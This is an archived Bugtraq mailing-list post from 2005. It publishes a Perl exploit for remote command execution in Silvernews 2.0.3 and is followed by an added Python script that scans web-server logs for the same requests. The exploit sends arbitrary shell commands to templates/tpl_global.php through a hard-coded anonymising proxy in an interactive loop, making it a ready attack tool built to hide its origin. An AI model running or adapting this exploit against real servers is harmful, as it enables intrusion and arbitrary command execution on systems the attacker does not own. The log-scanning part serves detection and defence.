Message-ID: <20050805171518.12928.qmail@securityfocus.com>
Date: 5 Aug 2005 17:15:18 -0000
From: tsl@...urityfocus.com, "[at]"@securityfocus.com,
	hackermail.com@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 remote command execution exploit, proxy server
 support!


Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------



#!/usr/bin/perl

################TSL###########################################################
#
#
# SilverNews Exploit included Proxy Server Function
# THROAT SECURITY LABS
#
#  vuln:  http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################

$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;

#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anonymity proxy

use IO::Socket;

sub sploit()
{

 $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
 Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";

 print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";

 print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
 print $sock "Connection: close$l";

while (<$sock>) {

    if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
	print "Error! Got HTTP return code $1. Exiting!\n";
	exit 1;

    }

    print if $t==1;
    $t=1 if /^$l$/;

 }

}

if (@ARGV != 2)

{

 print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
 print "-------------------------------------------------------\n\n";
 print "* usage:\t $0 [target] [path] \n";
 print "* example:\t $0 www.target.com newssystem \n";
 print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

 $target     = $ARGV[0];
 $location   = $ARGV[1];

 print "sending exploit ... please wait\n";
 sleep(1);

while(1){

   print "[sploit\@$target:/$location\] ";
   $_=<STDIN>;
   chop;
   next if /^$/;
   s/ /%20/;
   #if ($command=="exit") {exit} else {sploit()};
   $command=$_;
   sploit();

   }

}

#EOF#
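
A defender-side check for the request this script sends, as an added example that is not part of the original post: it scans web-server access logs for requests to templates/tpl_global.php that carry a command parameter. The combined log format, the function name find_hits and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
VULN_SUFFIX = "/templates/tpl_global.php"  # script path named in the post
SCRIPT_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  # UA hard-coded in the post

def find_hits(lines):
    """Return one record per 'command' value passed to tpl_global.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # urlsplit also copes with absolute or scheme-less proxy-style targets.
        parts = urlsplit(m["target"])
        # Decode and lowercase the path so %-encoding or case changes do not hide it.
        if not unquote(parts.path).lower().endswith(VULN_SUFFIX):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        cmds = [v for k, vals in params.items() if k.lower() == "command" for v in vals]
        for cmd in cmds:
            hits.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "command": cmd,                      # URL-decoded parameter value
                "script_ua": m["ua"] == SCRIPT_UA,   # weak indicator, trivially changed
            })
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
UA = ' "-" "%s"' % SCRIPT_UA
SAMPLE = [
    '203.0.113.7 - - [05/Aug/2005:17:20:01 +0000] "GET /newssystem/templates/tpl_global.php?command=id HTTP/1.1" 200 48' + UA,
    '203.0.113.7 - - [05/Aug/2005:17:20:09 +0000] "GET /newssystem/Templates/tpl%5Fglobal.php?Command=uname%20-a HTTP/1.1" 200 90 "-" "curl/7.1"',
    '198.51.100.9 - - [05/Aug/2005:17:21:00 +0000] "GET /newssystem/index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [05/Aug/2005:17:21:30 +0000] "GET /newssystem/templates/tpl_global.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```

A 200 status on a hit only shows that the script answered; whether the command ran has to be confirmed on the host itself.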


